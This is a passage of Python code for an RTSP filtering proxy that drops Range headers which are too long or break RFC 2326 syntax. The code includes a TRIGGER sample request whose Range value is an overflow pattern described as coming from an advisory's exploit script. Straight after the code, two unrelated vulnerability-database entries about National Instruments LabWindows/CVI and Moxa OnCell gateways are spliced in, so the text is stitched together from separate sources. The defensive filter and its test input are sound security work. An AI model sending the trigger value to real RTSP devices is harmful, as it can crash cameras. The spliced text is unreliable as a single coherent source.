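RANGE_RE = re.compile(
    r'^(?:npt=' + NPT_TIME + r'?-' + NPT_TIME + r'?'
    r'|smpte(?:-30-drop|-25)?=' + SMPTE_TIME + r'-' + SMPTE_TIME + r'?'
    r'|clock=' + CLOCK_TIME + r'-' + CLOCK_TIME + r'?)'
    r'(?:;time=' + CLOCK_TIME + r')?$'
)


def parse_rtsp_request(raw):
    """Split a raw RTSP request into (method, url, headers).

    Returns None when the request is not well formed: no CRLFCRLF terminator,
    a request line that is not 'METHOD URL RTSP/x.y', a header without a colon
    or non-ASCII bytes.  Header names are lower-cased for lookup.
    """
    try:
        text = raw.decode('ascii')
    except UnicodeDecodeError:
        return None
    head, sep, _body = text.partition('\r\n\r\n')
    if not sep:
        return None
    lines = head.split('\r\n')
    parts = lines[0].split(' ')
    if len(parts) != 3 or not parts[2].startswith('RTSP/'):
        return None
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(':')
        if not colon or not name.strip():
            return None
        headers[name.strip().lower()] = value.strip()
    return parts[0], parts[1], headers


def check_request(raw):
    """Decide whether a filtering proxy should forward the request.

    Returns (allowed, reason).  Requests without a Range header pass through;
    a Range value is rejected if it exceeds MAX_RANGE_LEN or does not match
    the RFC 2326 grammar, so the camera never sees it.
    """
    parsed = parse_rtsp_request(raw)
    if parsed is None:
        return False, 'malformed RTSP request'
    _method, _url, headers = parsed
    rng = headers.get('range')
    if rng is None:
        return True, 'no Range header'
    if len(rng) > MAX_RANGE_LEN:
        return False, 'Range header too long (%d bytes)' % len(rng)
    if not RANGE_RE.match(rng):
        return False, 'Range header does not match RFC 2326 syntax'
    return True, 'ok'


# Constructed sample requests.  BENIGN is what a normal player sends;
# TRIGGER carries the Range value from the advisory's section 7.3 script.
BENIGN = (b'PLAY rtsp://192.0.2.10/ RTSP/1.0\r\n'
          b'CSeq: 7\r\n'
          b'Range: npt=0-\r\n'
          b'User-Agent: example-player\r\n\r\n')
TRIGGER = (b'PLAY rtsp://192.0.2.10/ RTSP/1.0\r\n'
           b'CSeq: 7\r\n'
           b'Range: npt=Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9aLSaLSaLS\r\n'
           b'User-Agent: VLC media player (LIVE555 Streaming Media v2010.02.10)\r\n\r\n')

if __name__ == '__main__':
    for name, req in (('benign', BENIGN), ('trigger', TRIGGER)):
        allowed, reason = check_request(req)
        print('%-7s -> %s (%s)' % (name, 'forward' if allowed else 'drop', reason))
```

The length check runs before the grammar check so that the decision on an oversized value never depends on regular-expression behaviour on long input; a short but non-conforming value (letters where a time is expected) is still dropped by the grammar check. A deployment that relies on comma-separated multiple ranges or vendor-specific extensions would need to extend RANGE_RE accordingly.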
VAR-201308-0297 CVE-2013-5025 National Instruments LabWindows/CVI Help subsystem vulnerability CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
An ActiveX control in exlauncher.dll in the Help subsystem in National Instruments LabWindows/CVI before 2013 allows remote attackers to cause a denial of service by triggering the display of local example files. LabWindows/CVI is prone to an unspecified security vulnerability. The impact of this issue is currently unknown. We will update this BID when more information emerges. Versions prior to LabWindows/CVI 2013 are vulnerable
VAR-201308-0004 CVE-2012-3039 Multiple Moxa OnCell gateway products: firmware vulnerability allowing access rights to be obtained CVSS V2: 7.1
CVSS V3: -
Severity: HIGH
Moxa OnCell Gateway G3111, G3151, G3211, and G3251 devices with firmware before 1.4 do not use a sufficient source of entropy for SSH and SSL keys, which makes it easier for remote attackers to obtain access by leveraging knowledge of a key from a product installation elsewhere. Moxa OnCell Gateway can communicate with remote serial / Ethernet devices through GSM / GPRS / EDGE network for data and short message transmission. By calculating the private authentication key, an attacker can gain unauthorized access to the system and read the sensitive information of the device, or send commands to the device. This aids in other attacks. There is a security vulnerability in the Moxa OnCell Gateway module using firmware 1.3 and earlier. The following devices are affected: G3111, G3151, G3211, G3251